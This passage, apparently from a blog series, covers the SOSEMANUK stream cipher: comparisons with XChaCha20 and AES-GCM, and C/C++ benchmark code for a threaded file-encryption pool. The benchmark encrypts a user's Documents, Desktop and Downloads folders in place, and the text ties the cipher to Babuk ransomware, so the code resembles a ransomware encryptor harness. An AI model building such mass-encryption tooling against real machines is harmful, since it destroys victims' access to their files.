Being able to move from XChaCha20 to SOSEMANUK demonstrates, if anything, the modularity of the eSTREAM-style ciphers. Whether you choose ChaCha20, XChaCha20, SOSEMANUK, Salsa20, HC-128, or another eSTREAM portfolio cipher, the construction remains secure. The cipher is just a swappable component in a larger security framework. In contrast, traditional AEAD constructions like AES-GCM are less flexible in modular, software-oriented systems.

AES-GCM is secure and now pretty much universally deployed, but it isn’t always ideal for a software-oriented crypto system. It depends heavily on hardware acceleration, and without AES-NI or ARMv8 crypto extensions it’s often slower than modern software-optimized stream ciphers. GCM is also extremely sensitive to nonce reuse, where even a single repeated nonce under the same key can break confidentiality and integrity. Stream ciphers like SOSEMANUK or XChaCha20 are easier to use safely in pure software environments and degrade less catastrophically under misuse. AES-GCM also fixes encryption and authentication into a single AEAD mode, which limits the algorithm agility our design aims for. Finally, constant-time AES implementations are harder to get right in software, whereas ARX ciphers avoid secret-dependent table lookups by design and LFSR/FSM stream ciphers sidestep many of the same timing side-channel issues.

Benchmarking
As mentioned earlier, I found the scheme can outperform the XChaCha variant in some cases. If you want to measure that yourself, the thread pool already supports it: pass in a metrics object and it records results after each file. For reference, SOSEMANUK’s own speed test uses a minimal timing loop:

C:

// sosemanuk.c basic timing structure
clock_t orig, end;
unsigned long speed_counter;

orig = clock();
sum = sosemanuk_internal(&rc, speed_counter);
end = clock();

double elapsed = (double)(end - orig) / CLOCKS_PER_SEC;
double throughput = (speed_counter * 20.0 * 4.0) / elapsed;
printf("32-bit words per second: %.0f\n", throughput / 4.0);

This measures raw cipher speed only. It ignores disk I/O, key setup, and thread scheduling, so it’s not representative of real file encryption. For practical benchmarking, QueryPerformanceCounter gives reliable high‑resolution timing. The class below tracks bytes, file count, and elapsed time:

C++:

class BenchmarkMetrics {
private:
    LARGE_INTEGER frequency, startTime;
    ULONGLONG totalBytes;
    DWORD totalFiles;
    CRITICAL_SECTION lock;

public:
    BenchmarkMetrics() : totalBytes(0), totalFiles(0) {
        QueryPerformanceFrequency(&frequency);
        InitializeCriticalSection(&lock);
    }
    ~BenchmarkMetrics() { DeleteCriticalSection(&lock); }

    void Start() { QueryPerformanceCounter(&startTime); }

    // Called by worker threads, so the counters are guarded by the lock
    void RecordFile(ULONGLONG size) {
        EnterCriticalSection(&lock);
        totalFiles++;
        totalBytes += size;
        LeaveCriticalSection(&lock);
    }

    void PrintResults() {
        LARGE_INTEGER end;
        QueryPerformanceCounter(&end);

        double elapsed = (double)(end.QuadPart - startTime.QuadPart)
                         / frequency.QuadPart;

        if (elapsed < 0.1) {
            printf("Too fast: no meaningful result\n");
            return;
        }

        double mb = totalBytes / (1024.0 * 1024.0);
        printf("Benchmark results:\n");
        printf("Total files:  %lu\n", totalFiles);
        printf("Total data: %.2f MB\n", mb);
        printf("Elapsed time: %.4f seconds\n", elapsed);
        printf("Throughput: %.2f MB/s\n", mb / elapsed);
        printf("Files/second:  %.2f\n", totalFiles / elapsed);
    }
};

The thread pool accepts an optional metrics object and updates it after each file:

C++:

class ThreadPool {
protected:
    void* context;
    BenchmarkMetrics* metrics;
    virtual void ProcessFile(const wchar_t* filepath) = 0;

public:
    ThreadPool(DWORD threads, void* ctx = NULL, BenchmarkMetrics* m = NULL)
        : context(ctx), metrics(m), shuttingDown(false) {}
    //...
};

// encryption pool:
class EncryptionThreadPool : public ThreadPool {
protected:
    void ProcessFile(const wchar_t* filepath) override {
        HCRYPTPROV hProv = (HCRYPTPROV)GetContext();

        // Record the size before encryption changes the file
        LARGE_INTEGER size = {0};
        HANDLE h = CreateFileW(filepath, GENERIC_READ, FILE_SHARE_READ,
                               NULL, OPEN_EXISTING, 0, NULL);
        if (h != INVALID_HANDLE_VALUE) {
            GetFileSizeEx(h, &size);
            CloseHandle(h);
        }

        if (encryptFile(filepath, hProv) && metrics)
            metrics->RecordFile(size.QuadPart);
    }
};

Running a Benchmark

C++:

BenchmarkMetrics metrics;
EncryptionThreadPool* pool = new EncryptionThreadPool(0, hProv, &metrics);

metrics.Start();

ProcessDirectoryThreaded(L"C:\\Users\\User\\Documents", pool);
ProcessDirectoryThreaded(L"C:\\Users\\User\\Desktop", pool);
ProcessDirectoryThreaded(L"C:\\Users\\User\\Downloads", pool);

delete pool;
metrics.PrintResults();

SOSEMANUK typically gets 4 to 7 cycles/byte on 32-bit x86; I measured around 7–8 on x64 Windows 10/11. The cost is lower on 32-bit builds because the cipher's 32-bit arithmetic maps directly onto the CPU. On x64 it runs slightly slower because it cannot exploit 64-bit parallelism, and some of the mixing and shuffling becomes slightly less efficient.
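To relate cycles/byte figures to the MB/s numbers the benchmark class prints, a quick conversion helps. The helper below is a hypothetical utility, not part of the project. It assumes a single core at a fixed clock and ignores disk I/O, turbo boost, and threading, so treat its output as an upper bound for one thread rather than a prediction.

```cpp
// Convert a cycles-per-byte figure into MiB/s for a given clock frequency.
// Assumes one core running flat out at `clock_hz` with no I/O stalls.
double cpb_to_mib_per_s(double cycles_per_byte, double clock_hz) {
    double bytes_per_second = clock_hz / cycles_per_byte;
    return bytes_per_second / (1024.0 * 1024.0);
}
```

For example, on an assumed 3.0 GHz core, 4 cycles/byte works out to roughly 715 MiB/s and 8 cycles/byte to roughly 358 MiB/s. Either figure is well above what many disks can sustain, which is why the end-to-end numbers for the two ciphers tend to land close together.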

C++:

printf("Testing XChaCha20-Poly1305...\n");
BenchmarkMetrics x;
x.Start();
// ...
x.PrintResults();

printf("\nTesting SOSEMANUK-Poly1305...\n");
BenchmarkMetrics s;
s.Start();
// ...
s.PrintResults();

They usually fall within around 10–20% of each other, depending on CPU and environment.

So Is It a Viable Algorithm?
Yes and no; here it doesn't really make much sense. Although it has, as mentioned, no known practical breaks and delivers excellent throughput, ChaCha20 is a better choice. It's usually faster, simpler to implement correctly, highly resistant to attacks, and now fairly well standardised. SOSEMANUK, on the other hand, is a more complex cipher, and it's older and less battle-tested. This makes it a less practical option despite its theoretical suitability. It is, however, still available in real software libraries (Crypto++) and used in some niche applications for custom encryption tooling or research projects. It also appeared in the ESXi version of the Babuk ransomware, which makes sense as it's optimized for high throughput on large sequential data such as VM disks.

Further Reading:

Berbain, C., et al., SOSEMANUK: A Fast Software-Oriented Stream Cipher, https://cr.yp.to/streamciphers/sosemanuk/desc.pdf
Bugbee, L., SOSEMANUK, Seanet, https://www.seanet.com/~bugbee/crypto/sosemanuk/
FPGA Implementation of Stream Cipher SOSEMANUK, IEEE Xplore, https://ieeexplore.ieee.org/document/10062861
GitHub – cchcc/SOSEMANUK: stream cipher, https://github.com/cchcc/SOSEMANUK/tree/master
GitHub – agl. “curve25519-donna: Portable C Implementation of Curve25519.” https://github.com/agl/curve25519-donna
Chuong Dong, “Babuk Ransomware v3 – Technical Analysis and Reverse Engineering Notes,” https://www.chuongdong.com/reverse engineering/2021/01/16/BabukRansomware-v3/
